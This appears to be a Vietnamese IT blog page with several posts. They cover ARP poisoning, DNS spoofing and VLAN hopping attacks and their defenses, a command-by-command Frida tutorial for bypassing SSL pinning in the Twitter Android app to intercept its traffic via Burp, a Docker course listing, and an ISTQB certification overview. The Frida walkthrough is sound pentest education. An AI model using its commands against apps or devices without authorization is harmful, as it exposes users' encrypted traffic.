Việc đầu độc gói tin ARP này chính là đánh vào yếu tố bất lợi và không bảo mật của giao thức ARP ban đầu. Rõ ràng qua đoạn trên cũng có thể thấy được tính bất cập của gói ARP request và reply. Bất kỳ một máy tính nào đó không phải mang địa chỉ Y.Y.Y.Y nhưng hắn cũng có thể lấn quyền máy thật và giả mạo rằng mình mang IP đó, và sau đó đem địa chỉ MAC của mình ra cung cấp. Bên request không có cơ chế kiểm soát chặt chẽ người đứng ra nhận, mà chỉ căn cứ vào mỗi địa chỉ IP rồi chấp nhận chuyển đi.

Chặn bắt thông tin dùng ARP Poisoning

Đặc biệt, giao thức ARP không giống như DNS chỉ có thể được cấu hình để chấp nhận các nâng cấp động (dynamic updates), các thiết bị sử dụng giao thức ARP sẽ chấp nhận cập nhật bất cứ lúc nào. Điều này có nghĩa rằng bất cứ thiết bị nào có thể gửi gói ARP reply đến một máy tính khác và máy tính này sẽ cập nhật vào bảng ARP cache của nó ngay giá trị mới này. Việc gửi một gói ARP reply khi không có request nào được tạo ra gọi là việc gửi ARP “cho không”. Khi các ARP reply cho không này đến được các máy tính đã gửi request, máy tính request này sẽ nghĩ rằng đó chính là người mình đang tìm kiếm để truyền tin, tuy nhiên thực chất họ lại đang bắt đầu thiết lập kết nối với một kẻ xấu giả danh để thực hiện cho việc tấn công MITM.

Các biện pháp phòng chống

Ngày nay với sự phát triển của các phần mềm bảo mật cũng như sự ra đời của giao thức HTTPS, ARP – Poisoning đã không còn hiệu quả như lúc trước. Có thể kể đến một vài biện pháp để phòng chống như:

  • Bảo mật LAN

Giả mạo ARP Cache là một kỹ thuật tấn công mà nó chỉ sống sót khi cố gắng chặn lưu lượng giữa hai thiết bị trên cùng một LAN. Chỉ có một lý do đáng lo ngại về vấn đề này là liệu thiết bị nội bộ trên mạng của có bị thỏa hiệp, hoặc ai đó có thể cắm một thiết bị không tin cậy vào mạng. Mặc dù tập trung toàn bộ những cố gắng bảo mật của mình lên phạm vi mạng nhưng việc phòng chống lại những mối đe dọa ngay từ bên trong và việc có một thái độ bảo mật bên trong tốt có thể giúp ta loại trừ được loại tấn công này.

  • Mã hóa ARP Cache

Một cách có thể bảo vệ chống lại vấn đề không an toàn vốn có trong các ARP request và ARP reply là thực hiện một quá trình kém động hơn. Đây là một tùy chọn vì các máy tính Windows cho phép ta bổ sung các entry tĩnh vào ARP cache. Trong các trường hợp, nơi cấu hình mạng không mấy khi thay đổi, ta hoàn toàn có thể tạo một danh sách các entry ARP tĩnh và sử dụng chúng cho các client thông qua một kịch bản tự động. Điều này sẽ bảo đảm được các thiết bị sẽ luôn dựa vào ARP cache nội bộ của chúng thay vì các ARP request và ARP reply.

  • Kiểm tra lưu lượng ARP với chương trình của hãng thứ ba

Tùy chọn cuối cùng cho việc phòng chống lại hiện tượng giả mạo ARP cache là phương pháp phản ứng có liên quan đến việc kiểm tra lưu lượng mạng của các thiết bị. Ta có thể thực hiện điều này với một vài hệ thống phát hiện xâm phạm (chẳng hạn như Snort) hoặc thông qua các tiện ích được thiết kế đặc biệt cho mục đích này (như xARP). Điều này có thể khả thi khi ta chỉ quan tâm đến một thiết bị nào đó, tuy nhiên nó vẫn khá cồng kềnh và vướng mắc trong việc giải quyết với toàn bộ đoạn mạng.

Chặn bắt thông tin dùng DNS- Spoofing

Giao thức DNS

Giao thức DNS (Domain Name System – hệ thống phân giải tên miền) là một giao thức quan trọng nhất được dùng trong Internet, cho phép thiết lập tương ứng giữa địa chỉ IP và tên miền. Mỗi website có một tên (là tên miền hay đường dẫn URL) và một địa chỉ IP. Khi mở một trình duyệt Web và nhập tên website, trình duyệt sẽ đến thẳng website mà không cần phải thông qua việc nhập địa chỉ IP của trang web. Quá trình “dịch” tên miền thành địa chỉ IP để cho trình duyệt hiểu và truy cập được vào website là công việc của một DNS server. Các DNS trợ giúp qua lại với nhau để dịch địa chỉ “IP” thành “tên” và ngược lại. Người sử dụng chỉ cần nhớ “tên”, không cần phải nhớ địa chỉ IP (địa chỉ IP là những con số rất khó nhớ).

Phương pháp tấn công DNS- Spoofing

DNS – spoofing là một kĩ thuật cung cấp thông tin DNS sai lệch cho một host. Khi người dùng yêu cầu truy cập đến một địa chỉ website thì nó sẽ chuyển hướng, đưa người dùng tới một địa chỉ giả mạo có hình thức giống với địa chỉ thật và họ không hề hay biết rằng mình đang bị lừa. Kẻ tấn công sẽ lấy cắp được những thông tin nhạy cảm của người dùng, hoặc cài các phần mềm độc hại, hay có thể gây ra một từ chối dịch vụ nào đó.

Mô hình tấn công DNS – spoofing

Một ví dụ, khi người dùng cần truy cập hộp thư điện tử của mình tại địa chỉ www.mbbank.com có địa chỉ IP là X.X.X.X thì khi đó, kỹ thuật này sẽ chuyển hướng yêu cầu sang một trang giả mạo có địa chỉ IP là Y.Y.Y.Y do kẻ tấn công dựng nên để chiếm đoạt tài khoản của người dùng.

Có nhiều phương pháp triển khai kỹ thuật DNS Spoofing, đơn giản nhất là DNS ID Spoofing. Mỗi truy vấn DNS được gửi đi qua mạng đều có chứa một số nhận dạng duy nhất. Mục đích của số nhận dạng là phân biệt các truy vấn và phản hồi chúng một cách chính xác. Để chặn một truy vấn DNS nào đó được gửi đi từ máy nạn nhân, kẻ tấn công sẽ tạo một gói giả mạo có chứa số nhận dạng đó để gói dữ liệu được chấp nhận bởi máy nạn nhân.

Tấn công giả mạo DNS sử dụng phương pháp ID Spoofing

Quá trình tấn công này được thực hiện với hai bước. Đầu tiên, tiến hành ARP Cache Poisoning thiết bị, mục đích là để định tuyến lại lưu lượng của nó qua host đang sử dụng để tấn công của mình, từ đó có thể chặn yêu cầu DNS và gửi đi gói dữ liệu giả mạo để lừa nạn nhân truy cập vào website giả mạo của kẻ tấn công dựng nên thay vì vào thẳng website chính thức mà họ đang cố gắng truy cập.

Các biện pháp phòng chống DNS Spoofing

Tấn công DNS Spoofing rất khó để phòng chống vì có khá ít các dấu hiệu tấn công. Nạn nhân sẽ không thể nhận ra là mình đang bị chuyển hướng truy cập vào trang giả mạo cho đến khi thấy có gì đó bất thường khi tiến hành đăng nhập. Hoặc nếu kẻ tấn công không khéo léo, thì nạn nhân mới nhận ra có điều gì đó khác thường ngay lúc giao diện trang web hiện ra.

Một số hướng phòng chống tấn công DNS Spoofing:

Bảo mật hệ thống máy tính của bạn: Các dạng tấn công này thường xuất phát ngay từ trong nội bộ. Nếu làm công tác bảo mật tốt ngay từ yếu tố môi trường thật, yếu tố con người thì việc bị lợi dụng để chuyển hướng DNS là điều bất khả thi.

Tránh sử dụng DNS cho các hệ thống bảo mật: Điều này đồng nghĩa, nếu môi trường đó có chứa dữ liệu nhạy cảm của công ty, thì việc hạn chế sử dụng Internet, cấm truy cập mạng ở các máy tính đó là điều cần thiết.

Sử dụng IDS: Một dạng hệ thống phát hiện dấu hiệu xâm nhập. Khi được đặt và triển khai trên hệ thống của ta, nó có thể phát hiện các hình thức giả mạo ARP cache và giả mạo DNS.

Sử dụng DNSSEC: DNSSEC là một giải pháp thay thế mới cho DNS, sử dụng các bản ghi DNS có chữ ký (Signature) để bảo đảm sự hợp lệ hóa của đáp trả truy vấn. Giải pháp này đã có sự triển khai nhất định.

VLAN Hopping

Các giao thức hoạt động trong môi trường VLAN

Các chuẩn đóng gói VLAN

Khi sử dụng nhiều VLAN trong mạng có các Switch được nối với nhau, giữa các Switch sẽ được kết nối trunk. Đường trunk này có nhiệm vụ truyền frame của các VLAN khác nhau cùng một lúc. Khi gởi frame tới một Switch khác, các Switch cần một cách để định ra các VLAN mà frame muốn gởi tới. Vì thế chúng ta cần một chuẩn để đóng gói các frame để các switch phân biệt được frame đó của VLAN nào.

  • Inter-switch link (ISL):  Đây là chuẩn độc quyền của cisco nên chỉ có thể sử dụng trên các switch của cisco. ISL đóng gói toàn bộ các frame Ethernet gốc trong một ISL header. Các frame Ethernet được đóng gói bên trong không có gì thay đổi. Trong ISL header sẽ gán vlan ID, dựa vào vlan ID này nên Switch nhận biết được frame thuộc VLAN nào gửi tới.
  • IEEE 802.1Q: Đây là một chuẩn dùng chung cho tất cả các thiết bị. Chuẩn này được sử dụng cho môi trường mạng LAN, 802.1Q sử dụng hoàn toàn khác với ISL, nó không đóng gói frame gốc mà nó thêm vào header của frame 4 bytes. Trong 4 bytes đó thì sẽ chứa VLAN ID và dựa vào VLAN ID mà switch có thể nhận biết ra frame thuộc VLAN nào.
  • Giao thức VLAN Trunking Protocol (VTP)

VTP là giao thức độc quyền của Cisco hoạt động ở lớp 2 của mô hình OSI. VTP giúp cho việc cấu hình VLAN luôn đồng nhất khi thêm, xóa, sửa thông tin về VLAN trong một hệ thống mạng. VTP được thiết lập để giải quyết các vấn đề nằm bên trong hoạt động của môi trường mạng VLAN.

Ví dụ: Một hệ thống có các kết nối Switch hỗ trợ bởi các VLAN. Để thiết lập và duy trì kết nối bên trong VLAN , mỗi VLAN phải được cấu hình thông suốt trên tất cả các Switch. Khi phát triển mạng và các Switch được thêm vào mạng, mỗi Switch mới phải được cấu hình với các thông tin của VLAN trước đó. Lúc này với VTP cho phép chỉ cần tạo VLAN trên server thông tin sẽ được phân phối đến các switch khác, nếu có thay đổi VLAN thì giữa các Switch sẽ tự động đồng bộ với nhau. VTP sử dụng các gói tin VTP Advertisement để đồng bộ. Theo chu kỳ 5 phút 1 lần các Switch sẽ gửi gói tin này cho các Switch nối trực tiếp với nó. Mặc định thì VTP đã được bật trên Switch nhưng không tắt giao thức này được.

Giao thức VTP

Để thực hiện đồng bộ thông tin của cấu hình VLAN thì phải thỏa mãn 2 điều kiện sau:

  • Có đường trunk nối các switch lại với nhau
  • Các Switch phải cùng chung 1 miền VTP

VTP chỉ giúp đồng bộ thông tin cấu hình VLAN chứ không đồng bộ cổng. Vì vậy phải cấu hình gán cổng cho các VLAN trên Switch.

  • Giao thức Dynamic Trunking Protocol (DTP)

DTP là giao thức độc quyền của cisco dùng để thiết lập đường trunk và cách đóng gói frame VLAN (chuẩn IEEE 802.1Q hoặc chuẩn ISL) giữa 2 Switch. Có thể cấu hình đường trunk bằng tay giữa hai thiết bị chuyển mạch. Nhưng với giao thức DTP thì đường trunk được thiết lập một cách tự động. Theo mặc định thì giao thức DTP đã được bật trên các thiết bị chuyển mạch của Cisco. Giữa Router và Switch có thể cấu hình đường trunk nhưng không có giao thức này vì Router không hiểu được giao thức DTP. Người quản trị mạng có thể cấu hình trạng thái DTP trên mỗi trunk port. Các trạng thái bao gồm: on, off, desirable, auto và non- negotiate.

  • On: trạng thái này được sử dụng khi Switch khác không hiểu giao thức DTP
  • Off: trạng thái này được sử dụng khi cổng đã được cấu hình từ trước không với mục đích trở thành trunk port
  • Desirable: trạng thái này được sử dụng khi cổng Switch muốn trở thành trunk port
  • Auto: đây là trạng thái mặc định trên nhiều Switch
  • Non- negotiate: trạng thái này được sử dụng khi người quản trị muốn một loại trunk được đóng gói ISL hay IEEE 802.1Q cụ thể.

Trên phần lớn Switch giao thức DTP trên các cổng được cấu hình mặc định là auto.

VLAN Hopping

VLAN Hopping là một phương thức tấn công mạng dựa trên những yếu tố của VLAN. Attacker sử dụng VLAN Hopping khi muốn đi vòng qua các thiết bị lớp 2, lớp 3 khi trao đổi thông tin từ một VLAN này sang một VLAN khác. Ý tưởng tấn công dựa trên các trunk port trên Switch được cấu hình bất hợp lý. Mặc định, các trunk port có thể truy cập tới tất cả các VLAN. Dữ liệu truyền qua các đường trunk này có thể được đóng gói theo chuẩn IEEE 802.1Q hoặc ISL (Inter – Switch Link).

VLAN Hopping có thể được sử dụng để ăn cắp mật khẩu và các thông tin nhạy cảm khác từ các thuê bao mạng cụ thể. VLAN hopping cũng có thể được sử dụng để sửa đổi, làm hỏng, hoặc xóa dữ liệu, hay cài đặt phần mềm gián điệp hoặc các chương trình phần mềm độc hại khác và lan truyền virus , worms, Trojan trong mạng.

VLAN Hopping được thực hiện theo 2 cách: Switch Spoofing và Double Tagging.

  • VLAN Hopping với Switch Spoofing:

Tất cả các trunk port đều có thể truy cập tới tất cả các VLAN. Nếu Attacker kết nối vào trunk port thì Attacker sẽ thấy được tất cả các gói tin của tất cả các VLAN bằng các phần mềm Sniffer. Để tiến hành tấn công VLAN Hopping theo kiểu Switch Spoofing, Attacker sẽ gửi các gói tin được đóng gói theo các chuẩn Inter- Switch Link (ISL) hoặc 802.1Q cùng với Dynamic Trunking Protocol (DTP) , để thiết lập kết nối trunk đến Switch. Theo mặc định thì trạng thái DTP trên mỗi trunk port trên Switch đều ở chế độ auto, khi Attacker gửi DTP packet đến Switch thì Switch sẽ kết nối trunk với Attacker. Do đó, Attacker sẽ dễ dàng truy cập vào tất cả các VLAN. Attacker có thể gửi packet hoặc nhận các packet tới bất kỳ VLAN nào.

VLAN Hopping – Switch Spoofing
  • VLAN Hopping với Double Tagging:

Kiểu tấn công này lợi dụng cách thức hoạt động của Switch. Hiện nay, phần lớn các Switch chỉ thực hiện đóng gói IEEE 802.1Q. Điều này cho phép Attacker trong những tình huống cụ thể có khả năng gắn các đuôi 802.1Q (gọi là .1Q tag) vào khung. Khung này sẽ vào VLAN với đuôi .1Q đầu ra không xác định. Một đặc điểm quan trọng của kiểu tấn công VLAN Hopping Double Tagging là nó thậm chí có thể tiến hành với các cổng trunk đã được thiết lập ở chế độ off.

VLAN Hopping – Double tagging

Các biện pháp phòng chống

Cách phòng chống tấn công VLAN Hopping với Switch Spoofing: tắt tính năng trunking trên tất cả các port ngoại trừ port dùng để kết nối đến các Switch khác. Trên port trunk thì cũng tắt tính năng Dynamic trunking (DTP), chỉ cấu hình trunk tĩnh.

Cách phòng chống tấn công VLAN Hopping với Double Tagging: Kiểu tấn công này chỉ xảy ra khi native VLAN trên đường trunk trùng với VLAN mà Attacker sử dụng để tấn công. Vì thế cần cài đặt native trên các đường trunk là một VLAN không có user nào sử dụng ( không có port nào gán vào VLAN này- unused VLAN).

Tác giả : Hoàng Sơn Hà

loading...

Bypass SSL Pinning trên ứng dụng Android bằng Frida Framework

0

Hello mọi người, lâu rùi mình không viết một bài chia sẻ chi tiết về cách sử dụng một framework hay một công cụ, vì mình chưa tìm được công cụ nào thật sự ấn tượng để chia sẻ. Tuy nhiên hôm nay sau khi test qua một số thì mình quyết định viết bài chia sẻ về Frida, một công cụ khá hay giúp các bạn có thể pentest, trace,… các ứng dụng trên điện thoại Android hay IOS.

Để nói về Frida thì công cụ này có rất nhiều chức năng, tuy nhiên bài viết này sẽ chỉ tập trung vào việc bypass SSL Pinning. Để giải thích cho bạn nào chưa biết thì SSL Pinning hay còn gọi là Certificate Pinning là một kĩ thuật giúp máy chủ có thể biết được và ngăn chặn các request giả mạo bằng cách làm giả Certificate bằng cách check một lần nữa các certificate được gửi lên. Điều này làm cho các ứng dụng sử dụng SSL Pinning sẽ không bị Burp Suite log lại request hoặc không thể chạy được nếu dùng Burp Suite Certificate.

Ngày nay, các ứng dụng thường xuyên được cập nhật các công nghệ mới để bảo mật hơn, SSL Pinning là một kĩ thuật khá quan trọng và được rất nhiều ứng dụng áp dụng. Giúp tránh các cuộc tấn công MITM, tránh bị lộ các API quan trọng ( Ít nhất là với người dùng phổ thông hay tò mò)

Frida là một framework giúp bạn chèn được các đoạn mã vào một ứng dụng đang được cài trên thiết bị, giúp bạn có thể nắm được các luồng hoạt động của ứng dụng làm cho việc pentest trở nên dễ dàng hơn rất nhiều.

1. Những điều cần chuẩn bị

I, Thiết bị đã được root

Để sử dụng Frida thì bạn cần có một máy Android đã được root ( Máy thật hoặc máy ảo tùy bạn ) để có thể chèn được script vào thư mục root của máy. Trong bài viết này thì mình dùng Genymotion để thao tác vì mình không có máy Android :((( Bạn có thể dễ dàng tải Genymotion tại link này

Sau khi tải về thì bạn sẽ tải máy ảo về. Nên cài Android 7+ để có thể sử dụng tốt nhất. Trong bài này mình cài Google pixel XL với cấu hình như sau

II, Cài đặt Python Frida

Cài đặt Python trên windows tại link :

https://www.python.org/downloads/windows/

Sau khi đã cài đặt python xong, bạn mở Windows Powershell lên và gõ lần lượt các lệnh sau để cài các package còn thiếu

python -m pip install Frida
python -m pip install objection
python -m pip install frida-tools 

Hoặc

pip install Frida
pip install objection
pip install frida-tools

III, Cài đặt Platform-tools ( ADB)

Tiến hành tải Platform-tools cho windows bản mới nhất tại link :

https://dl.google.com/android/repository/platform-tools-latest-windows.zip

IV, Tải về mã SSL Bypass để chèn vào ứng dụng

Để có thể bypass được SSL Pinning thì chúng ta cần viết một đoạn mã để bypass, ở đây mình sử dụng script được viết sẵn tại link

https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/

Tải đoạn mã về và lưu thành fridascript.js và lưu luôn ở trong folder của adb để tiện thao tác ^^

2. Tiến hành cài đặt

I, Kết nối thiết bị vào ADB

Đầu tiên bạn phải bật USB Debugging trên điện thoại. Truy cập vào Cài đặt – Tùy chọn nhà phát triển và bật chế độ Gỡ lỗi USB ( USB Debugging). Tùy loại máy mà có cách bật khác nhau, Bạn có thể tra google với cụm từ “Cách bật gỡ lỗi USB + tên máy của bạn

Sau khi bật thì mở thư mục platform-tools vừa tải về và gõ lệnh sau để kết nối tới thiết bị :

//adb connect <ip of device:port>
adb connect 192.168.1.190:5555 
Hoặc 
 adb connect 192.168.1.190:21503

Bấm chọn OK nếu có thông báo như sau trên điện thoại

II, Tải và cài đặt Frida Server trên điện thoại

Truy cập vào link sau để tải Frida Server

https://github.com/frida/frida/releases/

Để biết cần tải bản nào về, bạn cần gõ lệnh sau trên cmd:

adb shell getprop ro.product.cpu.abi

Nếu thiết bị của bạn cài đặt giống mình thì bạn hãy tải 2 file sau về :

 frida-server-12.4.7-android-x86.xz
frida-server-12.4.7-android-x86_64.xz

II, Tải và cài đặt ứng dụng cần pentest vào điện thoại

Phần này là đương nhiên, bạn cần test gì thì bạn cài cái đó zô 😀

3. Cài đặt Frida Server

Chúng ta cần cài đặt frida-server vào trong điện thoại trước khi có thể inject được script vào ứng dụng.

Bước 1 : Đẩy frida-server vào trong điện thoại

Copy file frida-server-12.4.7-android-x86.xz vừa tải ở trên vào folder adb và gõ lệnh sau để đưa file vào trong điện thoại qua ADB

//adb push <path_of_frida_server_folder><space></data/local/tmp>adb push C:\ADB\frida-server /data/local/tmp

Bước 2 : Phân quyền chạy cho frida-server

 adb shell chmod 777 /data/local/tmp/frida-server

4. Cài đặt Burp Suite

Truy cập vào link sau để tìm hiểu rõ hơn cách cấu hình thiết bị android để dùng được Burp proxy. Mình sẽ không nói chi tiết về phần này ở đây. Bạn có thể đặt câu hỏi ở phần bình luận nếu gặp thắc mắc.

https://support.portswigger.net/customer/portal/articles/1841101-configuring-an-android-device-to-work-with-burp

5. Đẩy cert của Burp suite vào ứng dụng

Gõ lệnh sau để đẩy certificate đã tải ở mục 4 vào trong điện thoại.

 // adb push <path to cacert.der> /data/local/tmp/cert-der.crt
adb push cacert.der /data/local/tmp/cert-der.crt

6. Inject script và bypass SSL Pinning

Sau khi tải hoàn tất các bước chuẩn bị ở trên thì giờ mới đến lúc chúng ta thực sự “làm gì đó” :))) Ở đây là sẽ inject file “fridascript.js” vào ứng dụng.

Đẩy file “fridascript.js” vào thiết bị

//adb push <path_to_fridascript.js_folder> /data/local/tmp
adb push C:\ADB\fridascript.js /data/local/tmp 

Kiểm tra và chạy frida-server

adb shell /data/local/tmp/frida-server &

Nhớ là có dấu “&” ở cuối lệnh nha.

Liệt kê các ứng dụng đang chạy trên điện thoại

Bạn có thể gõ lệnh sau để liệt kê các ứng dụng đang chạy, trong bài này mình sẽ tập trung vào bypass SSL Pinning của Twitter

frida-ps -U

Để ý phần com.twitter.android là package name của ứng dụng Twitter. Để inject script vào ứng dụng này thì mình gõ :

//frida -U -f <your_application_package_name> -l <path_to_fridascript.js_on_your_computer> --no-paus

frida -U -f com.twitter.android -l D:\frida\fridascript.js --no-paus

Nếu mọi thứ trơn tru không xảy ra lỗi gì, thì bạn làm xong rồi đấy 😀 Bạn có thể mở Burp suite lên để kiểm chứng kết quả

Chúc bạn thành công <3

loading...

Chia sẻ video khóa học Docker cơ bản

0

Video Khoá Học Docker Cơ Bản | Khóa học Docker cơ bản sẽ hướng dẫn bạn các thao tác cơ bản làm việc với Docker và áp dụng Docker vào các yêu cầu môi trường cụ thể. Bạn sẽ được hướng dẫn cài đặt môi trường, chạy ứng dụng đầu tiên trên nền Docker, cơ chế, cách quản lý và tạo lập Docker image… Phương pháp giảng dạy tập trung chủ yếu vào việc thực hành qua các bài tập và ví dụ, giúp bạn được trang bị nhiều kinh nghiệm thực tiễn.

I. Tại sao phải dùng Docker ?

Việc setup và deploy application lên một hoặc nhiều server rất vất vả từ việc phải cài đặt các công cụ, môi trường cần cho application đến việc chạy được ứng dụng chưa kể việc không đồng nhất giữa các môi trường trên nhiều server khác nhau. Chính vì lý do đó Docker được ra đời để giải quyết vấn đề này.

II. Docker là gì ?

Docker là một nền tảng cho developers và sysadmin để develop, deploy và run application với container. Nó cho phép tạo các môi trường độc lập và tách biệt để khởi chạy và phát triển ứng dụng và môi trường này được gọi là container. Khi cần deploy lên bất kỳ server nào chỉ cần run container của Docker thì application của bạn sẽ được khởi chạy ngay lập tức.

III. Lợi ích của Docker

  • Không như máy ảo Docker start và stop chỉ trong vài giây.
  • Bạn có thể khởi chạy container trên mỗi hệ thống mà bạn muốn.
  • Container có thể build và loại bỏ nhanh hơn máy ảo.
  • Dễ dàng thiết lập môi trường làm việc. Chỉ cần config 1 lần duy nhất và không bao giờ phải cài đặt lại các dependencies. Nếu bạn thay đổi máy hoặc có người mới tham gia vào project thì bạn chỉ cần lấy config đó và đưa cho họ.
  • Nó giữ cho word-space của bạn sạch sẽ hơn khi bạn xóa môi trường mà ảnh hưởng đến các phần khác.

Nội dung video:

Bài 1: Giới thiệu
Bài 2: Docker là gì
Bài 3: Cơ chế hoạt động của Docker
Bài 4: Docker khác gì so với virtual machine?
Bài 5: Kiến trúc Docker
Bài 6: Docker Toolbox
Bài 7: Docker Machine
Bài 8: Docker Hub
Bài 9: Cài đặt Docker trên Windows
Bài 10: Cài đặt Docker trên Linux
Bài 11: Giới thiệu image
Bài 12: Giới thiệu container
Bài 13: Vòng đời Docker (phần 1)
Bài 14: Vòng đời Docker (phần 2)
Bài 15: Bài tập chương 3
Bài 16: Cơ chế lưu trữ của Container
Bài 17: Chạy các tiến trình trong container
Bài 18: Một số lệnh thường dùng với Docker container
Bài 19: Quản lý container
Bài 20: Kết nối mạng giữa các container
Bài 21: Liên kết các container
Bài 22: Liên kết động giữa các container
Bài 23: Bài tập chương 4
Bài 24: Docker registry
Bài 25: Quản lý image
Bài 26: Xuất và nhập image
Bài 27: Volume
Bài 28: Bài tập chương 5
Bài 29: Dockerfile
Bài 30: Một số lệnh thường dùng trong Dockerfile
Bài 31: Build image từ Dockerfile
Bài 32: Bài tập chương 6
Bài 33: Tổng kết khóa học

Link tải : TẠI ĐÂY

loading...

Chứng chỉ ISTQB là gì? Vì sao nó lại cần thiết cho ngành kiểm thử

0

Trong ngành Kiểm Thử, ít hay nhiều chúng ta đều đã từng nghe qua chứng chỉ ISTQB của ngành kiểm thử phần mềm. Vậy chúng ta biết gì về chứng chỉ này, ngày hôm nay, hãy cùng DTH Share tìm hiểu và phân tích về chứng chỉ này nhé.

Chứng chỉ ISTQB là gì?

Chứng chỉ ISTQB là chứng chỉ kiểm thử phần mềm được quốc tế chấp nhận được tiến hành trực tuyến bởi Member Boards (Hội đồng Thành viên) thông qua Exam Provider (Tổ chức cung cấp đề Kiểm tra).

Tổ chức cung cấp đề Kiểm tra là tổ chức được cấp phép bởi (các) Hội đồng thành viên để cung cấp các bài kiểm tra tại địa phương và quốc tế bao gồm chứng chỉ kiểm tra trực tuyến. Các thí sinh vượt qua kỳ thi thành công được cấp chứng chỉ “ISTQB Certified Tester“.

Trang web https://www.istqb.org/ hiện là trang web chính thức, cung cấp thông tin chính xác nhất về chứng chỉ ISTQB.

Chứng chỉ ISTQB – International Software Testing Qualifications Board  (Hội đồng kiểm định phần mềm quốc tế), chứng chỉ này có hiệu lực tại 70 quốc gia nơi ISTQB được đại diện bởi một Hội đồng Thành viên.

Tên của Hội đồng Thành viên khác nhau giữa các quốc gia. Ví dụ, hội đồng thành viên ở Hoa Kỳ được gọi là Ban kiểm định phần mềm Mỹ (American Software Testing Qualifications Board – ASTQB), ở Ấn Độ được gọi là Ban kiểm tra Ấn Độ (Indian Testing Board – ITB).

Tuy nhiên giáo trình cho kỳ thi, các câu hỏi, mô hình của kỳ thi và tất cả các chi tiết khác vẫn giữ nguyên. ISTQB là một tổ chức phi lợi nhuận do các tình nguyện viên và các chuyên gia trong ngành điều hành.

Chứng chỉ này được chia ra theo 3 mức cấp độ:

1. Foundation level certification (chứng chỉ sơ cấp/Căn Bản)

Chứng chỉ mức độ Foundation (Căn Bản) là chứng chỉ cấp nhập môn, được thành lập với mục đích dành cho những người mới và các học viên có kinh nghiệm muốn bắt đầu di chuyển các bậc thang của chứng chỉ ISTQB.

Các mục tiêu của Chứng nhận Foundation là đảm bảo sự hiểu biết sâu rộng về các thực tiễn tốt nhất cơ bản và các khái niệm chính trong kiểm thử phần mềm, cùng với các hình thức kiểm thử cơ bản như stress test, load test,.. và để cung cấp một nền tảng cho sự phát triển chuyên nghiệp. Các giáo trình bao gồm sáu chủ đề chính (6 topics):

  • Nguyên tắc cơ bản của kiểm thử (Fundamentals of Testing);
  • Kiểm thử trong vòng đời phần mềm (Testing in the Software Lifecycle);
  • Các kỹ thuật tĩnh (Static Techniques);
  • Thiết kế kiểm thử hành vi (hộp đen) và cấu trúc (hộp trắng) (Behavioral (black-box) and Structural (white-box) Test Design);
  • Công cụ kiểm tra  (Testing Tools);
  • Cuối cùng là quản lý kiểm thử (Test Management).

2. Advance level certification (chứng chỉ trung cấp/Nâng Cao)

Chứng chỉ nâng cao này là chứng chỉ bậc trung cấp, được thiết kế cho những người có ít nhất 5 năm kinh nghiệm làm việc trong ngành kiểm thử.

Các mục tiêu của Chứng chỉ Nâng cao là để đảm bảo sự hiểu biết về các phương pháp hay nhất và các khái niệm then chốt tiên tiến trong kiểm thử phần mềm giữa các chuyên gia kiểm thử đã cam kết và hỗ trợ sự phát triển chuyên nghiệp.

Giáo trình được chia thành ba lĩnh vực chính:

  • kiểm thử hộp đen và kiểm thử hành vi tiên tiến đối với kiếm thử viên theo định hướng kinh doanh;
  • Kiểm thử tự động hóa và kiểm thử hộp trắng hoặc cấu trúc tiên tiến cho những kiểm thử viên và lập trình theo hướng kỹ thuật;
  • Các khái niệm quản lý kiểm thử tinh vi cho các nhà quản lý.

3. Expert level certification (chứng chỉ mức cao cấp/chuyên gia)

Chứng nhận Expert, dành cho các nhà lãnh đạo trong lĩnh vực kiểm thử phần mềm, những người có tám năm kinh nghiệm trở lên.

Các mục tiêu của Chứng nhận chuyên gia là để đảm bảo sự hiểu biết nhất quán và thực hiện các kỹ thuật tiên tiến đã được chứng minh bởi các chuyên gia thử nghiệm dày dạn kinh nghiệm, và dẫn dắt nghề kiểm thử phần mềm.

Vì các chuyên gia có khuynh hướng chuyên môn hóa, chúng tôi sẽ cung cấp các chủ đề khác nhau về giải quyết các vấn đề như kiểm tra quy trình, kiểm tra tự động hóa, quản lý kiểm tra và các kỹ thuật kiểm tra theo ngành cụ thể.

Vì sao chứng chỉ ISTQB lại cần thiết cho ngành kiểm thử?

Chứng chỉ ISTQB là một trong những chứng nhận kiểm tra trực tuyến tốt nhất mà bạn có thể có trong hồ sơ của mình.

Nó được thực hiện bởi một tổ chức phi lợi nhuận được tạo thành từ các chuyên gia ngành công nghiệp trên toàn thế giới, những người có nhiều thập kỷ kinh nghiệm trong Kiểm thử phần mềm.

Lợi ích của chứng chỉ kiểm thử này

Ngoài ra, chứng chỉ này còn có những lợi ích khác như:

  • Các câu hỏi là câu hỏi dạng nhiều lựa chọn (multiple choice), thực tế trong tự nhiên và trực quan, giúp cho kỳ thi dễ dàng hơn cho những người khác.
  • Không cần trình độ hoặc kinh nghiệm tối thiểu nhất thiết để tham dự kỳ thi cấp độ cơ sở (Foundation Level).
  • Các cá nhân từ lĩnh vực CNTT và không thuộc lĩnh vực CNTT đều có thể tham gia kỳ thi và nhận chứng chỉ này.
  • Điều này có nghĩa là bạn có thể thực hiện bài kiểm tra khi bạn đang học đại học,đang làm việc hoặc đang cố chuyển từ một lĩnh vực khác sang Kiểm Thử.
  • Có chứng chỉ kiểm thử phần mềm như ISTQB thể hiện sự thành thạo về các thực tiễn tốt nhất và các khái niệm chính trong lĩnh vực Kiểm thử phần mềm. Điều này có thể giúp thúc đẩy sự nghiệp của bạn và phân biệt bạn với những người còn lại đang tranh giành vị trí.
  • Chứng nhận này cũng cho người quản lý / người phỏng vấn của bạn thấy  rằng bạn đã thực hiện một nỗ lực có ý thức để cải thiện chuyên môn của bạn trong ngành Kiểm Thử này như thế nào.
  • Chứng chỉ ISTQB tương đối có các lệ phí “mềm” hơn các chứng chỉ khác
  • Bạn không cần phải tham dự khóa học kiểm thử phần mềm riêng biệt hoặc đào tạo QA để nhận chứng chỉ ISTQB. Tài liệu đào tạo QA hoàn chỉnh bạn cần để vượt qua thành công chứng nhận kiểm tra trực tuyến này có sẵn trên nhiều trang web miễn phí.

Tại sao chứng chỉ ISTQB là chứng chỉnh tốt nhất cho người trong ngành kiểm thử?

  • Ta có thể khẳng định điều này lần nữa rằng: Đây là chứng chỉ kiểm thử trực tuyến có thể được đưa lên bởi bất kỳ ai từ CNTT hoặc từ lĩnh vực phi CNTT.
  • Chứng chỉ kiểm thử phần mềm này là chứng chỉ kiểm thử phần mềm được công nhận rộng rãi và phát triển nhanh nhất trên thế giới.
